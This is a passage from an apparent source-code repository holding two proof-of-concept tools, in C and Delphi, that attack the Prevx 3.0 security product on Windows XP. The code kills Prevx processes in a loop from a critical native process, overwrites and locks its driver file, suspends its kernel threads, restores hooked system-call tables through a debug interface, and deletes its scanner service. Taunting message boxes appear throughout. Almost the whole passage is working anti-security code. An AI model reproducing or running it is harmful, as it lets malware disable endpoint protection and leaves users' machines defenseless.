} 166 | 167 | BOOL NTAPI DeviceIsRunning(IN PWSTR DeviceName) 168 | { 169 | UNICODE_STRING str; 170 | OBJECT_ATTRIBUTES attr; 171 | HANDLE hLink; 172 | NTSTATUS Status; 173 | 174 | BOOL result = FALSE; 175 | 176 | RtlInitUnicodeString(&str, DeviceName); 177 | InitializeObjectAttributes(&attr, &str, OBJ_CASE_INSENSITIVE, 0, 0); 178 | Status = NtOpenSymbolicLinkObject(&hLink, SYMBOLIC_LINK_QUERY, &attr); 179 | if (NT_SUCCESS(Status)) 180 | { 181 | result = TRUE; 182 | NtClose(hLink); 183 | } 184 | return result; 185 | } 186 | 187 | PVOID NTAPI mmalloc(DWORD uSize) 188 | { 189 | PVOID result = NULL; 190 | 191 | NtAllocateVirtualMemory(NtCurrentProcess(), &result, 0, &uSize, MEM_COMMIT | MEM_TOP_DOWN, PAGE_READWRITE); 192 | return result; 193 | } 194 | 195 | VOID NTAPI mmfree(PVOID Buffer) 196 | { 197 | DWORD memio = 0; 198 | NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memio, MEM_RELEASE); 199 | } 200 | 201 | PVOID NTAPI 202 | AllocateInfoBuffer( 203 | IN SYSTEM_INFORMATION_CLASS InfoClass, 204 | PULONG ReturnLength 205 | ) 206 | { 207 | PVOID pBuffer = NULL; 208 | ULONG uSize = PAGE_SIZE; 209 | NTSTATUS Status; 210 | 211 | do 212 | { 213 | pBuffer = mmalloc(uSize); 214 | 215 | if (pBuffer != NULL) 216 | { 217 | Status = NtQuerySystemInformation(InfoClass, pBuffer, uSize, NULL); 218 | 219 | } else return NULL; 220 | 221 | if (Status == STATUS_INFO_LENGTH_MISMATCH) 222 | { 223 | mmfree(pBuffer); 224 | uSize *= 2; 225 | } 226 | 227 | } while (Status == STATUS_INFO_LENGTH_MISMATCH); 228 | 229 | if (NT_SUCCESS(Status)) 230 | { 231 | if (ReturnLength) *ReturnLength = uSize; 232 | return pBuffer; 233 | } 234 | 235 | if (pBuffer) mmfree(pBuffer); 236 | return NULL; 237 | } 238 | 239 | typedef struct _BEEP_PARAMS { 240 | ULONG uFrequency; 241 | ULONG uDuration; 242 | } BEEP_PARAMS; 243 | 244 | HANDLE PrepareBeep() 245 | { 246 | UNICODE_STRING str; 247 | OBJECT_ATTRIBUTES attr; 248 | IO_STATUS_BLOCK iost; 249 | HANDLE f; 250 | 251 | RtlInitUnicodeString(&str, L"\\Device\\Beep"); 252 | attr.Length = sizeof(OBJECT_ATTRIBUTES); 253 | attr.RootDirectory = 0; 254 | attr.ObjectName = &str; 255 | attr.Attributes = 0; 256 | attr.SecurityDescriptor = 0; 257 | attr.SecurityQualityOfService = 0; 258 | 259 | NtCreateFile(&f, GENERIC_READ | GENERIC_WRITE, &attr, &iost, 0, 0, 260 | 0, FILE_OPEN, 0, 0, 0); 261 | 262 | return f; 263 | } 264 | 265 | void DoBeep(HANDLE f) 266 | { 267 | BEEP_PARAMS param; 268 | IO_STATUS_BLOCK iost; 269 | 270 | param.uFrequency = 2500; 271 | param.uDuration = 10; 272 | 273 | NtDeviceIoControlFile(f, 0, 0, 0, &iost, 0x00010000, 274 | ¶m, sizeof(BEEP_PARAMS), 0, 0); 275 | } 276 | 277 | NTSTATUS NativeDeleteFile(PWSTR FileName) 278 | { 279 | HANDLE hFile; 280 | NTSTATUS Status; 281 | OBJECT_ATTRIBUTES attr; 282 | IO_STATUS_BLOCK iost; 283 | FILE_DISPOSITION_INFORMATION fDispositionInfo; 284 | FILE_BASIC_INFORMATION fBasicInfo; 285 | UNICODE_STRING TargetFileName; 286 | 287 | Status = STATUS_UNSUCCESSFUL; 288 | 289 | RtlInitUnicodeString(&TargetFileName, FileName); 290 | InitializeObjectAttributes(&attr, &TargetFileName, OBJ_CASE_INSENSITIVE, 0, 0); 291 | 292 | Status = NtOpenFile(&hFile, DELETE | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES, 293 | &attr, &iost, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 294 | FILE_NON_DIRECTORY_FILE | FILE_OPEN_FOR_BACKUP_INTENT); 295 | if (NT_SUCCESS(Status)) 296 | { 297 | Status = NtQueryInformationFile(hFile, &iost, &fBasicInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation); 298 | if (NT_SUCCESS(Status)) 299 | { 300 | fBasicInfo.FileAttributes = FILE_ATTRIBUTE_NORMAL; 301 | NtSetInformationFile(hFile, &iost, &fBasicInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation); 302 | } 303 | fDispositionInfo.DeleteFile = TRUE; 304 | Status = NtSetInformationFile(hFile, &iost, &fDispositionInfo, sizeof(FILE_DISPOSITION_INFORMATION), FileDispositionInformation); 305 | NtClose(hFile); 306 | } 307 | return Status; 308 | } 309 | 310 | NTSTATUS 311 | NTAPI 312 | WriteBufferToFile( 313 | PWSTR lpFileName, 314 | PVOID Buffer, 315 | DWORD Size, 316 | BOOL Append 317 | ) 318 | { 319 | HANDLE fh; 320 | NTSTATUS ns; 321 | DWORD dwFlag; 322 | OBJECT_ATTRIBUTES attr; 323 | UNICODE_STRING str1; 324 | FILE_STANDARD_INFORMATION fs1; 325 | IO_STATUS_BLOCK iost; 326 | 327 | 328 | iost.Information = 0; 329 | 330 | if (RtlDosPathNameToNtPathName_U(lpFileName, &str1, NULL, NULL)) { 331 | 332 | ns = FILE_WRITE_ACCESS | SYNCHRONIZE; 333 | dwFlag = FILE_OVERWRITE_IF; 334 | 335 | if (Append) { 336 | ns |= FILE_READ_ACCESS; 337 | dwFlag = FILE_OPEN_IF; 338 | } 339 | 340 | InitializeObjectAttributes(&attr, &str1, OBJ_CASE_INSENSITIVE, 0, NULL); 341 | 342 | ns = NtCreateFile(&fh, ns, &attr, 343 | &iost, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, 344 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); 345 | 346 | if (NT_SUCCESS(ns)) 347 | { 348 | if (Append) 349 | { 350 | ns = NtQueryInformationFile(fh, &iost, &fs1, 351 | sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation); 352 | if (NT_SUCCESS(ns)) { 353 | ns = NtWriteFile(fh, 0, NULL, NULL, &iost, Buffer, Size, &fs1.EndOfFile, NULL); 354 | } 355 | } 356 | else { 357 | ns = NtWriteFile(fh, 0, NULL, NULL, &iost, Buffer, Size, NULL, NULL); 358 | } 359 | NtFlushBuffersFile(fh, &iost); 360 | NtClose(fh); 361 | } 362 | RtlFreeUnicodeString(&str1); 363 | } 364 | return ns; 365 | } 366 | 367 | void ScanProcesses() 368 | { 369 | ULONG r; 370 | PSYSTEM_PROCESSES_INFORMATION Info, p; 371 | HANDLE hProcess; 372 | NTSTATUS Status; 373 | OBJECT_ATTRIBUTES attr; 374 | CLIENT_ID cid; 375 | 376 | 377 | p = (PSYSTEM_PROCESSES_INFORMATION)AllocateInfoBuffer(SystemProcessInformation, &r); 378 | if (p == NULL) return; 379 | Info = p; 380 | for (;;) 381 | { 382 | if (Info->ProcessName.Buffer) 383 | { 384 | if (strcmpiW(Info->ProcessName.Buffer, L"prevx.exe") == 0) 385 | { 386 | cid.UniqueProcess = (HANDLE)Info->ProcessId; 387 | cid.UniqueThread = 0; 388 | InitializeObjectAttributes(&attr, 0, 0, 0, 0); 389 | 390 | Status = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &cid); 391 | if (NT_SUCCESS(Status)) 392 | { 393 | NtTerminateProcess(hProcess, 0); 394 | NtClose(hProcess); 395 | } 396 | DoBeep(hBeep); 397 | } 398 | } 399 | if (Info->NextEntryDelta == 0) break; 400 | Info = (PSYSTEM_PROCESSES_INFORMATION)(((PUCHAR)Info)+ Info->NextEntryDelta); 401 | } 402 | mmfree(p); 403 | } 404 | 405 | void BlockDriverAtDisk() 406 | { 407 | HANDLE hFile; 408 | OBJECT_ATTRIBUTES attr; 409 | IO_STATUS_BLOCK iost; 410 | UNICODE_STRING TargetFileName; 411 | LARGE_INTEGER cb, bo; 412 | NTSTATUS Status; 413 | 414 | RtlInitUnicodeString(&TargetFileName, L"\\SystemRoot\\system32\\drivers\\pxrts.sys"); 415 | InitializeObjectAttributes(&attr, &TargetFileName, OBJ_CASE_INSENSITIVE, 0, 0); 416 | 417 | Status = NtCreateFile(&hFile, FILE_READ_ACCESS | FILE_WRITE_ACCESS | SYNCHRONIZE, &attr, 418 | &iost, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, 419 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); 420 | 421 | if (NT_SUCCESS(Status)) 422 | { 423 | Status = NtWriteFile(hFile, 0, 0, 0, &iost, buf, sizeof(buf), 0, 0); 424 | 425 | if (NT_SUCCESS(Status)) 426 | { 427 | bo.HighPart = 0; 428 | bo.LowPart = 0; 429 | 430 | cb.HighPart = 0; 431 | cb.LowPart = sizeof(buf); 432 | 433 | NtLockFile(hFile, 0, 0, 0, &iost, &bo, &cb, 0, TRUE, TRUE); 434 | } 435 | } 436 | } 437 | 438 | void NtProcessStartup( PSTARTUP_ARGUMENT Argument ) 439 | { 440 | HANDLE ThreadHandle, UniqueThread; 441 | NTSTATUS Status; 442 | 443 | if (DeviceIsRunning(L"\\??\\pxscan")) 444 | { 445 | 446 | BlockDriverAtDisk(); 447 | hBeep = PrepareBeep(); 448 | 449 | Status = NativeCreateThread(&ThreadRoutine, &ThreadHandle, &UniqueThread, NtCurrentProcess()); 450 | if (NT_SUCCESS(Status)) 451 | { 452 | NtClose(ThreadHandle); 453 | } 454 | RtlSetProcessIsCritical(TRUE, NULL, FALSE); 455 | 456 | while ( 1 ) 457 | { 458 | NtSleep(1000); 459 | ScanProcesses(); 460 | } 461 | if (hBeep) NtClose(hBeep); 462 | } 463 | 464 | NtTerminateProcess(NtCurrentProcess(), 0); 465 | __asm 466 | { 467 | jmp Daniel 468 | } 469 | } -------------------------------------------------------------------------------- /Source/OpPrevx/v1.0.189/UnPrevx.dpr: -------------------------------------------------------------------------------- 1 | //{$DEFINE minimum} 2 | {$E exe} 3 | {$IMAGEBASE $00400000} 4 | {$R-} 5 | {$Q-} 6 | 7 | {$IFDEF minimum} 8 | program UnPrevx; 9 | {$ENDIF} 10 | {$IFNDEF minimum} 11 | unit UnPrevx; 12 | interface 13 | implementation 14 | {$ENDIF} 15 | 16 | {$R version.res} 17 | 18 | uses 19 | Windows, RTL, WinNative, LDASM, Loader; 20 | 21 | const 22 | Title: PWideChar = 'UnPrevX 1.0.189 (17.08.2010)'; 23 | ProcessesMaxID = 1; 24 | TargetProcesses: array[0..ProcessesMaxID] of PWideChar = ('Prevx.exe', ''); 25 | 26 | type 27 | _SYSINFO_BUFFER = record 28 | Count: ULONG; 29 | ModInfo: array[0..0] of SYSTEM_MODULE_INFORMATION; 30 | end; 31 | SYSINFO_BUFFER = _SYSINFO_BUFFER; 32 | PSYSINFO_BUFFER = ^_SYSINFO_BUFFER; 33 | 34 | _SYSINFOBUF = record 35 | uHandleCount: ULONG; 36 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 37 | end; 38 | SYSINFOBUF = _SYSINFOBUF; 39 | PSYSINFOBUF = ^_SYSINFOBUF; 40 | 41 | var 42 | ProcessHandles: array[0..31] of THANDLE; 43 | ProcessesID: array[0..ProcessesMaxID] of DWORD; 44 | ProcessHandlesCount: integer = 0; 45 | PointerToSDT: pointer = nil; 46 | TableBuffer: PVOID = nil; 47 | SnapShotHandle: THANDLE; 48 | pBuffer: PROCESSENTRY32W; 49 | tmp2: LBuf; 50 | 51 | 52 | type 53 | _SERVICE_DESCRIPTOR_ENTRY = record 54 | ServiceTableBase: PPVOID; 55 | ServiceCounterTableBase: PPVOID; //Used only in checked build 56 | NumberOfServices: DWORD; 57 | ParamTableBase: PBYTE; 58 | end; 59 | SERVICE_DESCRIPTOR_ENTRY = _SERVICE_DESCRIPTOR_ENTRY; 60 | PSERVICE_DESCRIPTOR_ENTRY = ^_SERVICE_DESCRIPTOR_ENTRY; 61 | 62 | const 63 | WINXP_SDT_ENTRIES_COUNT = 284; 64 | 65 | var 66 | KernelSize: DWORD; 67 | KernelBase, pOriginalSDT: PVOID; 68 | AppTerminated: boolean = false; 69 | 70 | procedure DisableCSIEngine(); //stop and disable CSI 71 | var 72 | hscm, hsrv: SC_HANDLE; 73 | begin 74 | hscm := OpenSCManagerW(nil, nil, SC_MANAGER_ALL_ACCESS); 75 | if (hscm <> 0) then 76 | begin 77 | strcpyW(tmp2, 'CSIScanner'); 78 | hsrv := OpenServiceW(hscm, tmp2, SERVICE_ALL_ACCESS); 79 | if (hsrv <> 0) then 80 | begin 81 | DeleteService(hsrv); 82 | CloseServiceHandle(hsrv); 83 | end; 84 | CloseServiceHandle(hscm); 85 | end; 86 | end; 87 | 88 | function FindOrigSDT(const pKernel: pointer; kernelBase: DWORD): DWORD; 89 | var 90 | t: DWORD; 91 | p1: PChar; 92 | begin 93 | result := 0; 94 | t := DWORD(FastGetProcAddress(HINST(pKernel), 'KeServiceDescriptorTable')) - DWORD(pKernel); 95 | p1 := pKernel; 96 | repeat 97 | if ((PWORD(p1)^ = $05C7) and (PDWORD(p1 + 2)^ = t + kernelBase)) then 98 | begin 99 | result := PDWORD(p1 + 6)^ - kernelBase; 100 | break; 101 | end; 102 | inc(p1); 103 | until false; 104 | end; 105 | 106 | function GetKeServiceDescriptorTable(fPtr: PChar): PVOID; 107 | var 108 | c: DWORD; 109 | begin 110 | for c := 0 to 4095 do 111 | if (PWORD(fPtr + c)^ = $888D) then 112 | begin 113 | result := PPVOID(fPtr + c + 2)^; 114 | exit; 115 | end; 116 | result := nil; 117 | end; 118 | 119 | function UnhookSSDT(param: PVOID): PVOID; stdcall; 120 | var 121 | rv: MEMORY_CHUNKS; 122 | bytesIO: ULONG; 123 | begin 124 | if (param = nil) then //loop 125 | begin 126 | SetThreadPriority(DWORD(-2), THREAD_PRIORITY_TIME_CRITICAL); 127 | while true and not AppTerminated do 128 | begin 129 | rv.Address := PSERVICE_DESCRIPTOR_ENTRY(TableBuffer)^.ServiceTableBase; 130 | rv.Data := pOriginalSDT; 131 | rv.Length := WINXP_SDT_ENTRIES_COUNT * sizeof(DWORD); 132 | ZwSystemDebugControl(DbgWriteVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 133 | NtSleep(500); 134 | end; 135 | end 136 | else 137 | begin 138 | rv.Address := PSERVICE_DESCRIPTOR_ENTRY(TableBuffer)^.ServiceTableBase; 139 | rv.Data := pOriginalSDT; 140 | rv.Length := WINXP_SDT_ENTRIES_COUNT * sizeof(DWORD); 141 | ZwSystemDebugControl(DbgWriteVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 142 | end; 143 | result := nil; 144 | end; 145 | 146 | procedure GetOriginalSystemState(); 147 | var 148 | pntkernel, psdt: PVOID; 149 | modinf: SYSINFO_BUFFER; 150 | bytesIO: ULONG; 151 | rv: MEMORY_CHUNKS; 152 | textbuf: array[0..MAX_PATH - 1] of WideChar; 153 | begin 154 | bytesIO := 0; 155 | ZwQuerySystemInformation(SystemModuleInformation, @modinf, sizeof(SYSINFO_BUFFER), @bytesIO); 156 | if (bytesIO = 0) then exit; 157 | strcpyW(textbuf, '\??\'); 158 | strcatW(textbuf, KI_SHARED_USER_DATA.NtSystemRoot); 159 | strcatW(textbuf, '\system32\'); 160 | RtlAnsiToUnicode(strendW(textbuf), @modinf.ModInfo[0].ImageName[modinf.ModInfo[0].ModuleNameOffset]); 161 | KernelBase := modinf.ModInfo[0].Base; 162 | pntkernel := PELdrLoadLibrary3(textbuf, nil, modinf.ModInfo[0].Base); 163 | if (pntkernel <> nil) then 164 | begin 165 | KernelSize := PEGetVirtualSize(pntkernel); 166 | 167 | TableBuffer := mmalloc(align(KernelSize, PAGE_SIZE), TRUE); 168 | if (TableBuffer <> nil) then 169 | begin 170 | psdt := PChar(pntkernel) + FindOrigSDT(pntkernel, DWORD(modinf.ModInfo[0].Base)); 171 | pOriginalSDT := mmalloc(WINXP_SDT_ENTRIES_COUNT * sizeof(DWORD)); 172 | if (pOriginalSDT <> nil) then 173 | memcopy(pOriginalSDT, psdt, WINXP_SDT_ENTRIES_COUNT * sizeof(DWORD)); 174 | 175 | rv.Address := KernelBase; 176 | rv.Data := TableBuffer; 177 | rv.Length := KernelSize; 178 | ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 179 | 180 | PointerToSDT := PChar(FastGetProcAddress(HINST(TableBuffer), 'KeAddSystemServiceTable')) 181 | - DWORD(TableBuffer) + DWORD(KernelBase); 182 | 183 | rv.Address := PointerToSDT; 184 | rv.Data := TableBuffer; 185 | rv.Length := 4096; 186 | ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 187 | 188 | PointerToSDT := GetKeServiceDescriptorTable(TableBuffer); 189 | rv.Address := PointerToSDT; 190 | rv.Data := TableBuffer; 191 | rv.Length := 4096; 192 | ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 193 | 194 | ZwClose(CreateThread(nil, 0, @UnhookSSDT, nil, 0, bytesIO)); 195 | 196 | bytesIO := 0; 197 | ZwFreeVirtualMemory(NtCurrentProcess, @pntkernel, @bytesIO, MEM_RELEASE); 198 | end; 199 | end; 200 | end; 201 | 202 | var 203 | cid: CLIENT_ID; 204 | attr: OBJECT_ATTRIBUTES; 205 | 206 | procedure FindAndDisablePrevxDriver(); 207 | var 208 | hThread: THANDLE; 209 | i, u: integer; 210 | Modules: PSystemModules; 211 | bytesIO, tadr1: DWORD; 212 | PrevxStart, PrevxEnd: DWORD; 213 | membuf: PChar; 214 | pp1: PSYSTEM_PROCESSES; 215 | pt1: PSYSTEM_THREADS; 216 | begin 217 | bytesIO := 0; 218 | i := 0; 219 | ZwQuerySystemInformation(SystemModuleInformation, @i, sizeof(DWORD), @bytesIO); 220 | 221 | PrevxStart := 0; 222 | PrevxEnd := 0; 223 | 224 | Modules := nil; 225 | ZwAllocateVirtualMemory(NtCurrentProcess, @Modules, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 226 | if (Modules <> nil) then 227 | begin 228 | ZwQuerySystemInformation(SystemModuleInformation, Modules, bytesIO, @bytesIO); 229 | for u := 0 to Integer(Modules^.Count) - 1 do 230 | begin 231 | if (strcmpiA(@Modules^.sysmodules[u].ImageName[Modules^.sysmodules[u].ModuleNameOffset], 'pxrts.sys') = 0) then 232 | begin 233 | PrevxStart := ULONG(Modules^.sysmodules[u].Base); 234 | PrevxEnd := ULONG(Modules^.sysmodules[u].Base) + Modules^.sysmodules[u].Size; 235 | break; 236 | end; 237 | end; 238 | bytesIO := 0; 239 | ZwFreeVirtualMemory(NtCurrentProcess, @Modules, @bytesIO, MEM_RELEASE); 240 | end; 241 | 242 | if (PrevxStart = 0) or (PrevxEnd = 0) then exit; 243 | 244 | membuf := mmalloc((1024 * 1024) * 4, true); 245 | if (membuf <> nil) then 246 | begin 247 | 248 | if (ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, membuf, bytesIO, @bytesIO) = STATUS_SUCCESS) then 249 | begin 250 | pp1 := PSYSTEM_PROCESSES(membuf); 251 | while (1 = 1) do 252 | begin 253 | if (pp1^.ProcessId = 4) then 254 | begin 255 | 256 | pt1 := PSYSTEM_THREADS(@pp1^.Threads); 257 | i := 0; 258 | u := pp1.ThreadCount; 259 | 260 | while (i < u) do 261 | begin 262 | tadr1 := ULONG(pt1^.StartAddress); 263 | if ((tadr1 >= PrevxStart) and (tadr1 <= PrevxEnd)) then 264 | begin 265 | InitializeObjectAttributes(@attr, nil, 0, 0); 266 | cid.UniqueProcess := pp1^.ProcessId; 267 | cid.UniqueThread := pt1^.ClientId.UniqueThread; 268 | if (ZwOpenThread(@hThread, THREAD_ALL_ACCESS, @attr, @cid) = STATUS_SUCCESS) then 269 | begin 270 | ZwSuspendThread(hThread, @bytesIO); 271 | ZwClose(hThread); 272 | end; 273 | 274 | end; 275 | inc(i); 276 | pt1 := PSYSTEM_THREADS(PChar(pt1) + sizeof(_SYSTEM_THREADS)); 277 | end; 278 | 279 | 280 | end; 281 | 282 | if (pp1^.NextEntryOffset = 0) then break; 283 | pp1 := PSYSTEM_PROCESSES(PChar(pp1) + pp1^.NextEntryOffset); 284 | end; 285 | end; 286 | mmfree(membuf); 287 | end; 288 | 289 | end; 290 | 291 | procedure TerminateProcesses(); 292 | var 293 | i: integer; 294 | hProcess: THANDLE; 295 | cid1: CLIENT_ID; 296 | attr: OBJECT_ATTRIBUTES; 297 | begin 298 | ProcessHandlesCount := 0; 299 | memzero(@ProcessesID, sizeof(ProcessesID)); 300 | memzero(@ProcessHandles, sizeof(ProcessHandles)); 301 | 302 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 303 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 304 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 305 | begin 306 | SetThreadPriority(DWORD(-2), THREAD_PRIORITY_TIME_CRITICAL); 307 | InitializeObjectAttributes(@attr, nil, 0, 0); 308 | cid1.UniqueThread := 0; 309 | if Process32FirstW(SnapShotHandle, @pBuffer) then 310 | repeat 311 | 312 | for i := 0 to ProcessesMaxID - 1 do 313 | begin 314 | if (strcmpiW(pBuffer.szExeFile, TargetProcesses[i]) = 0) then 315 | begin 316 | hProcess := 0; 317 | cid1.UniqueProcess := pBuffer.th32ProcessID; 318 | UnhookSSDT(pointer($100)); 319 | DisableCSIEngine(); 320 | if (ZwOpenProcess(@hProcess, PROCESS_TERMINATE, @attr, @cid1) = STATUS_SUCCESS) then 321 | begin 322 | UnhookSSDT(pointer($100)); 323 | ZwTerminateProcess(hProcess, 0); 324 | ZwClose(hProcess); 325 | end; 326 | end; 327 | end; 328 | 329 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 330 | CloseHandle(SnapShotHandle); 331 | end; 332 | 333 | MessageBoxW(0, 'That''s all folks, keep hooking =))', Title, MB_OK); 334 | end; 335 | 336 | function TargetIsRunning(): BOOLEAN; stdcall; 337 | var 338 | str1: UNICODE_STRING; 339 | attr: OBJECT_ATTRIBUTES; 340 | id1: THANDLE; 341 | begin 342 | result := false; 343 | RtlInitUnicodeString(@str1, '\??\pxrts'); 344 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 345 | if (ZwOpenSymbolicLinkObject(@id1, SYMBOLIC_LINK_QUERY, @attr) = STATUS_SUCCESS) then 346 | begin 347 | result := true; 348 | ZwClose(id1); 349 | end; 350 | end; 351 | 352 | var 353 | prev: integer; 354 | osver: OSVERSIONINFOEXW; 355 | begin 356 | if (MessageBoxW(GetDesktopWindow(), 'User mode proof-of-concept Prevx 3.0 kill'#13#10 + 357 | 'Fucking handles/SSDT/Shadow SSDT will not help Prevx!'#13#13#10 + 358 | 'Yes to continue, No to exit program'#13#10 + 359 | '(c) 2010 by EP_X0FF', Title, MB_YESNO) = IDNO) then exit; 360 | 361 | 362 | osver.old.dwOSVersionInfoSize := sizeof(osver.old); 363 | RtlGetVersion(@osver); 364 | if (osver.old.dwBuildNumber <> 2600) then 365 | begin 366 | MessageBoxW(0, 'Unsupported OS ', nil, MB_OK); 367 | end; 368 | SetPriorityClass(DWORD(-1), REALTIME_PRIORITY_CLASS); 369 | if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, @prev) <> STATUS_SUCCESS) then 370 | begin 371 | MessageBoxW(0, 'Cannot get more privilegies', Title, MB_OK); 372 | ExitProcess(0); 373 | end; 374 | if (TargetIsRunning()) then 375 | begin 376 | AppTerminated := false; 377 | MessageBoxW(GetDesktopWindow(), 'Prevx located, let''s do some fun with it', Title, MB_ICONINFORMATION); 378 | FindAndDisablePrevxDriver(); 379 | GetOriginalSystemState(); 380 | TerminateProcesses(); 381 | end else MessageBoxW(0, 'Prevx not found, start it first =)', Title, MB_OK); 382 | AppTerminated := true; 383 | if (pOriginalSDT <> nil) then mmfree(pOriginalSDT); 384 | if (TableBuffer <> nil) then mmfree(TableBuffer); 385 | end. 386 | 387 | -------------------------------------------------------------------------------- /Source/OpPrevx/Bovex/main.cpp: -------------------------------------------------------------------------------- 1 | #include "windows.h" 2 | #include ".\rtls\ntdll.h" 3 | #include "rtl.h" 4 | 5 | #pragma comment(linker,"/ENTRY:NtProcessStartup") 6 | #pragma warning(disable:4100) 7 | 8 | char *Daniel = "Hello Daniel .|."; 9 | 10 | WCHAR buf[MAX_PATH]; 11 | 12 | #define DRVROOT L"\\SystemRoot\\system32\\drivers\\" 13 | #define PXRTS L"pxrts.sys" 14 | #define PXSCAN L"pxscan.sys" 15 | 16 | HANDLE hBeep; 17 | HANDLE hMutant; 18 | 19 | 20 | void DoBeep(HANDLE f); 21 | void ScanProcesses(); 22 | NTSTATUS NTAPI WriteBufferToFile(PWSTR lpFileName, PVOID Buffer, DWORD Size, BOOL Append); 23 | 24 | NTSTATUS NTAPI BootPrint(IN PWSTR szMessage) 25 | { 26 | UNICODE_STRING us; 27 | RtlInitUnicodeString(&us,szMessage); 28 | return NtDisplayString(&us); 29 | } 30 | 31 | NTSTATUS NTAPI NtSleep(IN DWORD dwMiliseconds) 32 | { 33 | struct 34 | { 35 | DWORD Low; 36 | DWORD Hi; 37 | } MLI = {{-10000 * dwMiliseconds},{0xFFFFFFFF}}; 38 | 39 | return NtDelayExecution(0, (PLARGE_INTEGER)&MLI); 40 | } 41 | 42 | PVOID RtlGetProcessHeap() 43 | { 44 | return NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap; 45 | } 46 | 47 | NTSTATUS NTAPI ThreadRoutine(PVOID Param) 48 | { 49 | UNICODE_STRING String; 50 | OBJECT_ATTRIBUTES attr; 51 | NTSTATUS Status; 52 | 53 | RtlInitUnicodeString(&String, L"\\BaseNamedObjects\\DoTheEnd"); 54 | InitializeObjectAttributes(&attr, &String, OBJ_CASE_INSENSITIVE, 0, 0); 55 | 56 | while (1) 57 | { 58 | Status = NtOpenMutant(&hMutant, MUTANT_ALL_ACCESS, &attr); 59 | if (NT_SUCCESS(Status)) 60 | { 61 | NtClose(hMutant); 62 | RtlSetProcessIsCritical(FALSE, NULL, FALSE); 63 | NtTerminateProcess(NtCurrentProcess(), 0xC00FFEE); 64 | } 65 | NtSleep(1000); 66 | } 67 | 68 | return STATUS_SUCCESS; 69 | } 70 | 71 | NTSTATUS NTAPI NativeCreateThread( 72 | IN PVOID ThreadRoutine, 73 | OUT HANDLE *ThreadHandle, 74 | OUT HANDLE *UniqueThread, 75 | IN HANDLE ProcessHandle 76 | ) 77 | { 78 | NTSTATUS Status; 79 | ULONG AllocationSize = PAGE_SIZE * 256; 80 | PVOID BaseAddress = NULL; 81 | ULONG StackReserve = 0; 82 | PVOID ExpandableStackBase = NULL; 83 | ULONG OldProtect; 84 | ULONG ThreadRoutineLength = PAGE_SIZE; 85 | 86 | USER_STACK UserStack; 87 | CONTEXT Context; 88 | CLIENT_ID ClientId; 89 | 90 | BaseAddress = NULL; 91 | 92 | Status = NtAllocateVirtualMemory( 93 | ProcessHandle, 94 | &BaseAddress, 95 | 0, 96 | &AllocationSize, 97 | MEM_RESERVE, 98 | PAGE_READWRITE); 99 | 100 | if(!NT_SUCCESS(Status)) 101 | { 102 | return Status; 103 | } 104 | 105 | UserStack.FixedStackBase = NULL; 106 | UserStack.FixedStackLimit = NULL; 107 | UserStack.ExpandableStackBase = (PVOID)((ULONG)BaseAddress + AllocationSize); 108 | UserStack.ExpandableStackLimit = (PVOID)((ULONG)BaseAddress + AllocationSize - PAGE_SIZE); 109 | UserStack.ExpandableStackBottom = BaseAddress; 110 | 111 | ExpandableStackBase = (PVOID)((ULONG)UserStack.ExpandableStackBase - PAGE_SIZE * 2); 112 | 113 | StackReserve = PAGE_SIZE * 2; 114 | 115 | Status = NtAllocateVirtualMemory( 116 | ProcessHandle, 117 | &ExpandableStackBase, 118 | 0, 119 | &StackReserve, 120 | MEM_COMMIT, 121 | PAGE_READWRITE); 122 | if(!NT_SUCCESS(Status)) 123 | { 124 | return Status; 125 | } 126 | 127 | //create GUARD page 128 | StackReserve = PAGE_SIZE; 129 | Status = NtProtectVirtualMemory( 130 | ProcessHandle, // ProcessHandle 131 | &ExpandableStackBase, // BaseAddress 132 | &StackReserve, // ProtectSize 133 | PAGE_READWRITE | PAGE_GUARD, // NewProtect 134 | &OldProtect); // OldProtect 135 | 136 | if(!NT_SUCCESS(Status)) 137 | { 138 | return Status; 139 | } 140 | 141 | Context.SegGs = 0x00; 142 | Context.SegFs = 0x38; 143 | Context.SegEs = 0x20; 144 | Context.SegDs = 0x20; 145 | Context.SegSs = 0x20; 146 | Context.SegCs = 0x18; 147 | Context.EFlags = 0x3000; 148 | Context.ContextFlags = 0x10007; 149 | Context.Esp = (ULONG)UserStack.ExpandableStackBase; 150 | Context.Eip = (ULONG)ThreadRoutine; 151 | 152 | 153 | Status = NtCreateThread( 154 | ThreadHandle, // ThreadHandle 155 | THREAD_ALL_ACCESS, // DesiredAccess 156 | NULL, // ObjectAttributes 157 | ProcessHandle, // ProcessHandle 158 | &ClientId, // ClientId 159 | &Context, // ThreadContext 160 | (PINITIAL_TEB)&UserStack, // UserStack 161 | FALSE); // CreateSuspended 162 | 163 | if(!NT_SUCCESS(Status)) 164 | { 165 | return Status; 166 | } 